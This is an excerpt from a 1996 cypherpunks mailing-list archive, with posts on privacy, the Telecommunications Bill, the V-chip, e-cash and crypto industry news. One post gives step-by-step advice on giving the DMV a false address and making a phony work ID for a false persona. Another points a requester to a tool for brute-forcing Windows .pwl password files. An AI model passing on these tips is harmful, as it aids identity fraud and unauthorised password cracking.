> tells company B your address or favorite liquor?  Only by having access
> to the records of both companies.  Getting that through the courts,
> for only the parts of their information relevant to you, is better than
> blanket permission for the government to rummage through their files,
> but after the first lawsuit lets investigators in, everything they've got
> is clam bait anyway.  It's still major privacy violation - for the company
> whose machines are being violated, and for the non-suing individuals
> whose data is also on those machines.  

I agree that this is a problem but I still feel that an individual should 
have more rights than a corporation. It is true that there is a 
possiblity of the owners of the corporation may have their rights 
diminished, but you have to balance this against the protection that they 
get by being incorporated. Either the files belong to the corporation or 
they belong to the owner or shareholders. If they belong to the 
corporation, the individual wins the rights contest. If I follow your 
scenario, one need only form a corporation to avoid responsibility for 
any violations of the law.
I wish to reiterate here and now, that I am NOT advocating government 
access to computers or files. I am simply suggesting that data 
corporations should be required to take responsibility for the data that 
is in their care. If they do not take such care, they should be subject 
to sanction.

Regards, 
Tim Philp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Anarchives <tao@presence.lglobal.com>
Date: Sat, 10 Feb 1996 09:19:44 +0800
To: VALIS <valis@monopoly.att.com>
Subject: AT&T buys a Bill
Message-ID: <Pine.BSD/.3.91.960210001350.19073B-100000@presence.lglobal.com>
MIME-Version: 1.0
Content-Type: text/plain


		"The name of the game is Monopoly"
The Anarchives 				Volume 3 Issue 2
	The Anarchives			Published By
		The Anarchives		The Anarchy Organization
			The Anarchives	tao@lglobal.com

		Send your e-mail address to get on the list
		Spread The Word Pass This On...

               --/\--			AT&T buys
             /  /  \  \			a Bill
         ---|--/----\--|---		
             \/      \/			Welcome to the
             /\______/\			Information Age

-~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~ -~

February 9 1996

With the passing of the U$ 1996 Telecommunications Bill, we begin the 
game of monopoly, and we will see the rise of a new monopoly, a 
conglomeration of existing information providers, the ministry of 
communications for the emerging corporate state, an embodiment if not 
explicitly AT&T.

The telecommunications <or what will soon be termed 'communications> 
industry is inherently a monopoly. At least that's what the monopoly will 
argue when it finally wins the game.
Traditionally communication monopolies have been held in check by 
regulation from public institutions, and geographic separation by 
containing monopolies within regional markets.
The U$ Telecommunications Bill removes regulation, and introduces the 
double-speak 'competition', freeing monopolies to compete with each other 
across areas of local and long-distance markets. The double-speak comes 
in the fact that you need billions of dollars to compete in the first place.

In quoting Robert E. Allen, Chairman and C.E.O. of AT&T, "the fast lane 
has opened up", we are witnessing the continued acceleration of 
technological change, and the simultaneous acceleration of AT&T's 
imperial penetration into all communication markets.

The Telecommunications Bill carried with it provisions for the V-Chip, a 
piece of technology that promises to 'filter' television violence.
This part of the bill is a RED HERRING for both supporters and opponents, 
drawing attention away from the crucial decision of telecom. deregulation.
As if filtering television violence will even dent the rise of violence 
in our society. Violence that stems with an indentity crisis induced by 
the rapid deployment of information technology, and the submersion of 
the self within the technological mass. Of course we're told the 
solution to violence is just more technology, itself enhancing our 
virtual reality.
'here let's put some salt on that wound...'

Two 'baby bells', NYNEX and Bell Atlantic, local phone monopolies 
covering the north-eastern U$, are about to merge, and form a runner-up 
to monolith AT&T. Concentration justified by competition.
Everyone will grow fat, cause everyone is getting fatter.
Those who don't eat, will be eaten.

And with AT&T's recent announcement of a divestiture, they will have the 
flexibility and Ca$h necessary to traverse local and global markets, 
benefitting from the cross-subsidized marketing machine, and the value of 
a loyal and established 'brand'.

To quote Robert E. Allen again:
"We'll build our own network facilities to offer local services."

As AT&T brags about 'building' the Global Information Infrastructure, 
they also announce a huge sale where they're selling all of their 
equipment manufacturing facilities. Why? Cause they were no longer the 
most profitable and successful telecomm equipment makers in the world. 
Northern Telecom now is. Why? Because NorTel adopted the digital switch a 
decade ahead of AT&T. So why is AT&T claiming they're going to be 
building the infohighway? Cause they're going to buy Northern Telecom. 
NorTel has recently scored contracts in China, Brazil, and the U$. 
They're the company building the networks of the world. With the money 
from the divestiture AT&T could easily buy NorTel.
If they were really keen, they could increase there 2% stake in Bell 
Canada Enterprises, thus buying NorTel, Bell, and Bell Northern Labs, 
securing the world's best equipment corp., Canada's top R&D lab, and the 
Ontario and Quebec telecomm markets. Thus AT&T would be creating the 
foundation for North American corporate governance.

Yet how does AT&T dominate the market, and how will they continue to 
dominate and eventually conquer the market?
The easy and obvious answer is of course capital. AT&T has more, and 
controls more, and this certainly helps with ye olde corporate 
organization. However that is not the key focus of their success.
AT&T will conquer markets as a result of the strategic use of artificial 
intelligence and neural networks.
Artificial intelligence to navigate information networks, to manage 
marketing campaigns, to handle statistical and research data, to manage 
capital, and to manage the huge networks that are emerging as the global 
information infrastructure.
This is the technology that AT&T markets as 'Intelligent Assistants', and 
this is the technology that will give AT&T the competitive advantage.

In beginning his speach, Robert E. Allen said:
"We've seen an all-out bi-partisan effort. The administration and both 
parties in Congress pullled together on a major issue that will touch the 
lives of everyone in this - and we've seen it happen at the beginning of 
a major election year."

When i and i first read this paragraph I passed over it as just filler in 
the intro, but as i and i read on i and i realized the revealing nature of 
the passage.
All levels of the U$ government, congress, senate, and the executive, 
both parties, all supported the Bill.
Why?
Cause they _all_ got bought off by the powerful telecommunications industry.
AT&T sponsored the 1996 U$ elections, and in return can now enter the
$US 80 Billion dollar local phone market, let alone the rest of the 
communications market they now spread unto.

The name of the game is monopoly,
and the medium is the machine,
the thinking evolving corporate machine.

love and mighty media analysis
from the tao properganja center...

--------------------------------------------------------------
	To receive the Anarchives via email send a note to
	Majordomo@lglobal.com with the message in the body:
		subscribe anarchives
			Also check out:
		http://www.lglobal.com/TAO/









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sat, 10 Feb 1996 18:16:20 +0800
To: cypherpunks@toad.com
Subject: Re: Dealing with Credit Reporting Agencies...
Message-ID: <m0tl880-004XF1C@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:31 AM 2/5/96 -0600, Karl Ike wrote:
>Attila: I'm not in the business of running or hiding. I'm just an average,
>everyday working guy that doesn't like credit reporting agencies, what they
>stand for or what they do for money. I didn't say that I was going to do
>this. I just had the idea! I don't have the knowledge or the money to spend.
>That doesn't mean that there is someone out there that would jump at the idea.
>
>I just don't like the idea that these assholes know more about me than my
>mother and sell my private and personal information to anyone for big bucks.
>My credit is fine, just ask my banker or better yet, my mom.
>
>I am assumming that you know far more people on the internet since I have
>only been on for a month and have done three e-mail. I'm just suggesting to
>get the idea out and someone will take the ball and run. Yes, they will be a
>hunted man, but not a US citizen. Someone out there with a laptop and a
>cellular, living on a cruise ship, just may enjoy the idea.
>
>Just me, Karl

Well Karl, It seems I missed your idea/solution in this post, however, some of 
us figured this out some years ago... I begin a campaign almost 10 years ago 
of feeding the computers false information about myself. I never use the Social
Insecurity Number assigned to me... I don't even give it to the Bank. This makes
for some rather dicey situations. I rarely use my real name or give out my real
phone number. At this point in my life... I have *NO* credit history. I currently 
have *NO* bank account. My goal is to be completely invisible to the system.
Yes I have had a few glitches in this plan from time to time... but I continue to 
work on it.

I just have never felt warm and fuzzy knowing that any government agency,
business, or whoever can get my personal information off a computer could come
knock on my door some dark night. If you're interested in fortifying your privacy,
I can give you a few pointers.

1.) Go to your local DMV and inform them you've had a change of address. I
     selected a high rise apartment building with 15 floors and selected an address
     on a non-existant 23rd floor. Getting your Driver's License address changed
     should cost less than $10.00.

2.) Go find a company like "Mail Boxes Etc." and rent a mailbox. The cost is
     nominal compared to the added privacy and security. The distinction between
     a mailbox and a Post Office Box is with a mailbox you have an actual street
     address. You can receive deliveries from UPS and Federal Express at a 
     mailbox. You can't at a P.O. Box.

3.) This part requires some skill... befriending a graphic artist is a good idea for 
     this one. But what you need is a phony work identification.  Pick a name! A 
     couple of "Pass Port Photos" and some lamination and you're good to go.

4.) Take your new persona down to your local utility companies and get the serv-
     ice switched to the name of your new persona. Even get your phone switched
     and have the number non-published. You'll be pleasantly surprised from now
     on, everytime your phone rings, it will be someone you really want to talk to.

5.) Go down to your local Post Office and file a change of address form. Use the
     address of your mailbox. Remember, most companies that provide Mailbox
     service, will need to see your drivers license... which of course now has a
     non-existant address on it.

You can take this as far as you want... Just doing these 5 things will give you a
sense of comfort and security you've probably not had in a long time. How does
this fit into cyperpunks and encryption? The philosophy is the same! What good
is it encrypting your messages to ensure your privacy when everything else is
exposed! It's a lot like an Ostrich burying his head in the sand to hide, but leaving
all his good parts exposed!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF IRChat)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRlexoSAJOVFNaChAQFBCQf8Drm04x2YT5gZb8cklwep1eBVKxOMyVzn
/ZN3Tk+lKT05CAT0TCmHm+8oztqxWhgjMklYT228C5u4zvaF8ZrYvLxMp7RQPHvK
D2fSKdMGMs+pPvJxPUC5UXssoIsBS0W+i4dO5jDIj/MkXM4JFHsDHvFqr9Q7FqwE
Xr75lHjiNP4Gcv06WkVpJewJMaflP5zcrSam577/fbbCkYM6e4nhQPGdqdi83txM
hzvCs8cHalPa9UJGuSbIZObe1fAUkQMsVqEomXe5HuBzukJigwdqj4IK9SJixTVx
m0Fxf/W74j4lS1TXpqjCQoSD4EPRAleCYR6SFbqV/p0/cMYqv6kErA==
=4HYS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Sat, 10 Feb 1996 18:19:16 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Web900 -  The easiest way to charge users ...
Message-ID: <01BAF752.C34B9780@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Bob Hettinga forwarded to the list this:

>--- begin forwarded text
[deletia]
> ------------------------------------------------------------------
> Web900 -  The easiest way to charge users to access your web site!
> ------------------------------------------------------------------
[more deletia]

Rather than rely on the text Bob forwarded, I took a look at the Web page and
it appears to not have much more information than provided here.

Without knowing any more about this system than what is on their Web page,
one (apparently) obvious flaw is that it makes it real easy for me to charge my 
Web fees to my mother-in-law/friend/whoever's house I can get into and make 
the 900 # call.

Presumably this flaw can be minized by giving the access code a short
time to live so you have to enter it in the system real soon after getting it,
to discourage running around to all your (soon to be ex-)friends' houses.

Of course, this brings up the even more obvious flaw:

You have to cut short your browsing session (if you dial in) to make the phone
call, and then dial back in.  This strikes me as being much more complicated
and burdensome than any other method cited.  Also, since it seems that you
set up an account with the merchant through a single call/code, you could run
up quite a tab on someone else--untraceably--before you would get cut off.

It would be interesting to hear more about how this system
handles these issues.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sun, 11 Feb 1996 12:50:13 +0800
Subject: No Subject
Message-ID: <QQacgw17758.199602100643@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 7 Feb 1996, Jordan Hayes wrote:

> 	> it _is_ anonymous ...
> 
> And then:
> 
> 	> can be refilled at ATMs
> 
> You make a deposit or something?  How does the transaction clear?
> When they finally look in the envelope, they credit the card?
> 
> Or do you mean just 'anonymous' between the user and the merchant?
> 
> /jordan
> 

sorry i wasn't clear: it is anonymous between the user and the merchant, 
and between the user and the card distributer (in this case Visa). 
"Refilling" at ATMs is essentially a download of "cash" from your bank 
account into the card.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sun, 11 Feb 1996 12:53:09 +0800
Subject: No Subject
Message-ID: <QQacgx20417.199602100658@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Feb 1996, Jim Small wrote:

> DO you know where I can find glide.c , or (newer) to bruteforce
> .pwl files?

http://www.c2.org/hackmsoft/

There will also be a utility for extracting and decrypting file sharing
(Win95 as server) passwords as soon as the code is refined and the ReadMe 
is written.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 10 Feb 1996 10:56:31 +0800
To: cypherpunks@toad.com
Subject: IBM, RSA Security
Message-ID: <199602100134.CAA06117@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



More On IBM's Internet SecureWay Security Plans

London, 9 February 1996 -- IBM UK has revealed a little
more of the detail surrounding its deal with RSA Data
Security for the Big Blue range of SecureWay Internet
security products and services.

According to Kathy Kincaid, director of IT (information
security) programs with Big Blue, the idea behind the
development project is to develop a set of open
cryptography standards for the Internet and other
networks, so supporting secure electronic commerce.

Both companies plan to develop interoperable security
across IBM products and other vendor platforms. According
to IBM, their efforts will provide customers and
developers with safe universal access to the Internet,
consistent with US and non-US export regulations
governing cryptographic products.

The linkup between the two companies, Kincaid explained,
will allow them to modify RSA's BSAFE encryption engine
and Big Blue's Common Cryptographic Architecture (CCA)
for interoperability between RSA's toolkits and IBM's
CCA-based hardware systems.

"The complementary skills, technology and experience of
IBM and RSA will greatly benefit our customers and the
security industry," Kincaid said, adding that both
companies have been testing interoperability across a
series of virtual private networks (VPNs).

Jim Bidzos, RSA's CEO, claims that the deal will involve
several levels of close cooperation between RSA and Big
Blue, with staff at RSA's labs working with IBM's crypto
researchers at its T J Watson facility to produce "more
efficient and secure commercial cryptography.

"In addition, there will be close cooperation on the
development of protocols and interfaces. The result
should be trusted, seamless, interoperable security
across not only the IBM product line, but across vendor
products as well, when the resulting technology is
adopted by both RSA and IBM's large customer vase," he
explained.

In parallel with the launch of the SecureWay range of
Internet products and services, IBM's Internet decision
has agreed to begin an internal pilot test of RSA Secure,
RSA's disk and file encryption technology, which includes
a facility for emergency key access.

Further details of IBM's SecureWay range of Internet
products and services can be found on Big Blue's World
Wide Web ages, at http://www.ibm.com . According to IBM,
its security products support the security component of
the Open Blueprint. A white paper on security in the Open
Blueprint is available from IBM's Canada's test lab Web
pages at

http://www.torolab.ibm.com/openblue/openblue.html . 

--

IBM & RSA Develop "SecureWay" Internet Products

London, 8 February 1996 -- IBM and RSA Data Security have 
teamed up to develop open cryptography systems for the
Internet and other networks. Thanks to the linkup, IBM
plans to ship a whole range of Internet security products
to tie in with its existing range of Internet services,
over the next few months.

Anna Russell, a spokesperson for IBM's UK and European
operations, said that the RSA technology and products
deal applies worldwide, with the resultant security
products expected to dovetail in with Big Blue's existing
range of Internet services for businesses, end users, and
major corporations.

The whole ensemble of services, hardware and software,
will be banded together under the umbrella name of
SecureWay, a name that Russell claims will get the
message across to potential users that the IBM portfolio
covers many different aspects of computer networking.

"The SecureWay products and services will be offered
throughout IBM channels, ranging from dealers, right
through to value-added resellers. The SecureWay range
will be offered through all channels on a global basis,"
she explained.

According to Russell, the SecureWay range include access
controls, cryptographic hardware and software for the IBM
server series, smart cards and readers, gateway
firewalls, single logon security admin systems,
anti-virus software, distributed security management,
directory and security services for network servers, and
Internet browsers and servers, as well as secured
networks.

Kathy Kincaid, director of IBM's information technology
(IT) security programs in the UK and Europe, explained
that the SecureWay product range will include an
emergency response service, "ethical hacking" by Big
Blue's global security analysis labs, and turnkey
firewall installation services. ...

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sat, 10 Feb 1996 18:55:39 +0800
To: cypherpunks@toad.com
Subject: USPS Electronic Commerce Services
Message-ID: <199602101036.CAA24634@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Because I registered for the upcoming Internet Expo in San Jose,
    I got, by mail, an announcement of forthcoming Post Office services.
    These "Postal Electronic Commerce Services" will be demo'd at 
    Booth 626 at this show on February 20-21.

    The flyer says:
    "Postal Electronic Commerce Services will provide end-to-end
    security, confidentiality, integrity, and proof of origin to
    all your electronic information transfer and storage."

    Interestingly they suggest that the government is to be a prime
    beneficiary:  "For governments to get full value from the increased
    use of personal computers and public access terminals (kiosks)
    the privacy and security of every transaction must be guaranteed."

    Under the HOW IT WORKS section, after a quick gloss on public key
    cryptography they state: "Once a person generates a unique key
    (using their own software), they will take the "public" part of
    that key to a postal representative along with documents that
    prove their identity. Postal Electronic Commerce Services will
    then issue a certificate which guarantees that the identity of
    the person matches the "public" key that they presented.
    PECS will also electronically postmark the document using its own
    set of "keys".  This guarantees the validity of the stamp and
    legally establishes the existence of the document."

    They offer a FAX number for further info: (202) 268 4399
    and a phone too at (202) 268 3435.

    No mention of GAK or key length limits that I could see.
    I will surely be at their booth on the 20th.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 15:53:10 +0800
Subject: No Subject
Message-ID: <QQacha23862.199602100744@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 2/9/96 -0500, olbon@dynetics.com (Clay Olbon II) wrote:
>There is one potential side-benefit to the V-chip -- The inverse-V-chip
..
>I am looking forward to a time when I will never, even accidentally, have
>my TV tuned to "Full House" ;-)

Just as many people program their televisions using VCR-Plus codes to
record the shows they want (using TV Guide as a rating service)
it would be easy for any rating service to publish a list of the
codes for Approved Shows, Banned Shows, Rated-by-interestingness shows, etc.
without putting any government-mandated rating chip in the TVs
or forcing the TV producers to rate them (which also has a chilling
effect on the shows produced.)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 15:59:33 +0800
Subject: No Subject
Message-ID: <QQachb24474.199602100752@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>Sorry to post this question here, but I know of no other group with
>folks who would know. Have any of the "spiders" such as Alta Vista
>been sent to see just how many US sites have been blackened in the
>protest? The approximate number and percentage of US sites blackened
>might be interesting. In my limited surfing, I have been gratified
>to see the _widespread_ response -- but I am not the typical user.

I don't think it's updated enough things recently (or else it only indexes
the contents of a page and not the header details in the <BODY> statement.)
For instance, BGCOLOR="#000000" had 197 hits, but most of them were old,
and on topics like "How to set the background colors on your web page",
and NO documents matched both BGCOLOR="#000000" and vtw.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 16:00:02 +0800
Subject: No Subject
Message-ID: <QQachb24539.199602100753@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 AM 2/9/96 -0500, Duncan wrote, regarding the appallingly
invasive British Privacy Act:

>Computer bureaux which process personal data for others or allow data users
>to process personal data on their computers must also register. Their
>register entries will contain only their name and address.
>
>Data users and computer bureaux who should register but do not, are
>committing a criminal offence, as are those operating outside the
>descriptions contained in their register entries. In these cases the
>Registrar regularly prosecutes. The penalty for non-registration can be a
>fine of up to =A35,000 plus costs in the Magistrates Courts, or an=
 unlimited
>fine in the Higher Courts."

Ouch - does this mean that if you offer shell accounts, you either have
to contractually limit the processing your users may do, or be fined
as a criminal for not registering?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com=
 +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 16:12:15 +0800
Subject: No Subject
Message-ID: <QQachc25371.199602100802@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 08:39 AM 2/9/96 -0800, jamesd wrote:
>If you have one law for men who run businesses and one law [for] other folks, 
>then we have selective enforcement and application of the laws, 
>that enables governments to act selectively and capriciously.   
>For example here in California private citizens who attempt to organize 
>recall elections are often subject to extraordinary and confiscatory fines.

On the other hand, of course, there are laws that are ostensibly for
the purposes of regulating businesses whose primary effect is
to limit the privacy or actions of individuals.  For instance,
California's law requiring that mailbox renters provide two forms of ID
and make their mailbox companies agents for service of process 
is ostensibly to "protect" consumers by regulating businesses that 
operate out of mailboxes (which the law claims there are 7 million of here);
it furthermore lets the Post Office specify what kind of ID to use
(which some local postmasters are far more extreme about than others),
and requires revealing True Addresses.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 16:52:14 +0800
Subject: No Subject
Message-ID: <QQache00332.199602100840@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 09:21 AM 2/9/96 -0500, Tim Philp wrote:
>	Private individuals are not what I was refering to. I am more
>concerned about corporations who hold information about me and release it
>to the highest bidder. When it comes to individual versus corporate
>rights, I am clearly on the side of the individual. 

Remember that there's a major difference between "corporations"
and "business"; you seem to be mixing them up.  A corporation is
a legal fiction that treats a cooperative effort by one or more people
as if it were a person in itself, and normally involves limiting the
liability of the corporation's investors by putting it all on the
fictional person.  A business is what one or more people do to make money.
Most corporations are businesses, though not all.

Governments can legitimately tell corporations what to do because
that's part of the price of the legal fiction; a government can't
abuse a corporation because you can't beat up a legal fiction,
though it can say "Poof!  You're not a legal fiction any more",
and conversely, if the people who own the legal fiction don't like
what the government's telling it to do, they can dissolve it.
(Governments also enjoy regulating non-corporate businesses,
but they're no longer on solid moral ground.)

>	I have also not suggested some form of prior restraint that would 
>require government access to computers. I simply suggest that should a 
>violation occur, that I have the right of civil and criminal law as a 
>recourse to both compensate me for my loss of privacy as well as deter 
>future damage. A company knowing that civil and criminal penalties could 
>result from a violation would take extra care to ensure the security of 
>my data.

How are you going to _know_ that a "violation" occurred, if company A
tells company B your address or favorite liquor?  Only by having access
to the records of both companies.  Getting that through the courts,
for only the parts of their information relevant to you, is better than
blanket permission for the government to rummage through their files,
but after the first lawsuit lets investigators in, everything they've got
is clam bait anyway.  It's still major privacy violation - for the company
whose machines are being violated, and for the non-suing individuals
whose data is also on those machines.  
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 18:57:59 +0800
Subject: No Subject
Message-ID: <QQachh05320.199602100918@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



I found this article in misc.survivalism, but despite its presence there,
it actually has some interesting things to say about developing directions
in money laundering enforcement, including mention of electronic purses.
And "The Financial Times" is no slouch of a paper.

--Tim May



In article <4fbg19$nv1@ixnews7.ix.netcom.com>, taxhaven@ix.netcom.com(Adam
Starchild ) wrote:

> From The Financial Times (London) for February 3-4, 1996:
> 
> 
>    WORLD'S FINANCIAL POLICE TO CAST MONEY LAUNDERING NET WIDER
> 
>              by George Graham, Banking Correspondent
> 
> 
>      The world's leading financial policemen are to consider
> targeting money laundering from arms trafficking, extortion and
> bribery as well as the drugs trade.
>      Members of the Financial Action Task Force, grouping senior
> government officials from the European Commission, the Gulf Co-
> operation Council and 26 other countries, have launched a review
> of their guiding principles.
>      The review is expected to be completed by June, and could
> result in the criminalisation of money laundering linked to any
> serious crime.
>      The Task Force's current recommendations, which set out
> minimum standards for money laundering laws in member countries,
> only require the criminalisation of drug money laundering,
> although countries are also urged to consider extending the
> offence to other crimes with a narcotics link.
>      Mr. Ronald Noble, under-secretary for enforcement at the US
> Treasury and president of the Task Force, said the group had not
> yet decided whether to widen the definition of money laundering. 
> Including all serious crimes could, however, make it simpler for
> law enforcement officials to launch investigations of
> transactions that look suspicious but have no obvious drugs link.
>      "It would make it much easier to collect information," Mr.
> Noble said. "People who before were engaged in the illegal
> transfer of funds would find it more difficult and more costly."
>      A broader definition might, however, make it more difficult
> to apply the Task Force recommendation that countries should have
> the power to confiscate laundered money.
>      The review is not expected to result in big changes to the
> 40 principles currently recommended by the Task Force, which
> officials believe have already contributed to substantial
> advances in the fight against money laundering.
>      But the review will also have to consider whether to address
> the new issues raised by the development of "cybercash," new
> varieties of payments systems such as stored value cards or
> electronic purses.
>      "We have to be concerned as an organisation to come up with
> principles which recognize that technologies could pose a threat
> but do not define them in such a way that you are dated as soon
> as you publish them," Mr. Noble said.
>      Law enforcement officials are keen that the developers of
> new financial technologies should think about their criminal
> potential before they launch them, so that governments do not
> have to clamp down on them afterwards with rigid rules.
>      Possible safeguards against the misuse of electronic purses
> could include limiting their maximum value or restricting their
> use to certain closed systems.
> 
> Posted by Adam Starchild
>      Asset Protection & Becoming Judgement Proof on the World
> Wide Web at http://www.catalog.com/corner/taxhaven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 17:39:48 +0800
Subject: No Subject
Message-ID: <QQachh06121.199602100923@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Duncan,

> badly as you are upset. That is why some of us want less legislation
> and less regulation to minimize just this sort of human suffering. 
> Maybe next time those of you who are into "proactive" government
> will think before you crush other people's lives.
> 
That's why I support Lamar Alexander! <BG>.

Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 17:40:28 +0800
Subject: No Subject
Message-ID: <QQachh06884.199602100929@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I put I time line I've been keeping for my own reference up at:

http://rpcp.mit.edu/~reagle/commerce/line.html


>   --> The following is an extension of a timeline detailing the protocol
>   battles for Internet side credit card encryption and "processing" that
>   was an appendix of a paper Brett Leida and myself wrote. (One day it
>   will be on-line, as you can see, our argument that Visa/MC should
>   cooperate was a good one!)]
>
>   I'll add to it as time goes on, and hopefully updates should find
>   there way to the web server eventually.
>
>   I tried to provide the best reference I could, you can try to email me
>   if you need more info...
>
>
_______________________
Regards,               Talent develops in tranquillity, character in the
		       full current of human life. -Goethe
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 17:46:01 +0800
Subject: No Subject
Message-ID: <QQachi07295.199602100935@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain




>We ought to speak out against this Chineese net, and start asking
>questions about Western companies that are collaborating in its
>construction.  

*definitely*!

>We ought to allow the free export of any crypto tools to any country for
>any reason.  

     No!  You have no duty to promote an entity that actively acts against your
fundamental principles

>But if there are going to be any restrictions at all, it 
>ought to be on tools used for anti-democratic controls.

     The essence of the measure, or guideline stated in your previous paragraph 
is to protect freedom and the individual.  Therefore, we must *personnally* put
try to act in a way compatible with our basic view of how life should really be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sat, 10 Feb 1996 18:05:59 +0800
Subject: No Subject
Message-ID: <QQachj08574.199602100955@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Feb 1996, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 08:27 AM 02/9/96 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
> > The Administration has repeatedly stated its belief that those parts of 
> >the bill are unconsitutional, and does not intend to enforce them. 
> 
> So why the fornicate did they include them? What's the point of passing laws that they say they're not going to enforce, unless it's either to enforce them later, or soften up the public for something _slightly_ more tolerable later.
> 
['Fornicate' isn't really a synonym for 'fuck' - only single people can 
'fornicate', but married people can still 'fuck' (though apparently there 
isn't the same motivation)]

Basic laws of politics... The reason the telecommunications bill got
signed into law in spite of the Exon ammendment is that the bill it was 
attached to was politically unvetoable. Not only was telecommunications 
reform an important part of the Clinton/Gore Agenda from 92, but also the 
amount of lobbying and financial muscle being put behind the bill was 
such that a veto just because of the CDA would not have been sustained - 
further, such a veto would be perfect fodder for this Autumn's festival 
of negative delights. Since it is clear that the courts must reject this 
part of the bill, it's better to denounce the measure, but sign the bill 
anyway, knowing that the nasty bits will be cut out (or rather, the nasty 
bits won't be ... oh, you know what I mean).

If the CDA wasn't so blatantly unconstitutional, then I believe that the
President would have vetoed it- the anti-abortion elements make it
completely unacceptable; however, since the courts really have no choice 
but to remove the indeceny provisions, Bill gets a pretty nice equivalent 
of a retroactive line-item veto.

Simon

p.s.

Talking about Negative Ad's: there's a great new book out called "Going
Negative" by Stephen Ansolabehere and Shanto Iyengar. This book is an
extended write up of some extremely well designed experiments designed to
measure the effect of poltical advertisments on the public. For perhaps
the first time ever in the Social Sciences, the authors performed actual,
real, honest to goodness experiements, and the data are quite convincing.
The most worrying results are that 

1) Political advertising is isomorphic to the prisoners dilemma, and once
an opponent uses a negative ad, the only way to respond is with
counter-attacks

2) One of the main effects of negative advertising is not to change 
peoples votes, but to reduce turnout. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@netcom.com (Matthew Ghio)
Date: Sun, 11 Feb 1996 00:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: The V-Chip glass is half full
In-Reply-To: <199602100721.XAA18354@netcom7.netcom.com>
Message-ID: <199602101540.HAA03913@myriad>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) wrote:
> With some luck, we will be able to see on TV what we can now see in the
> movie theater, and the prudes will screen it out with the V-Chip the same
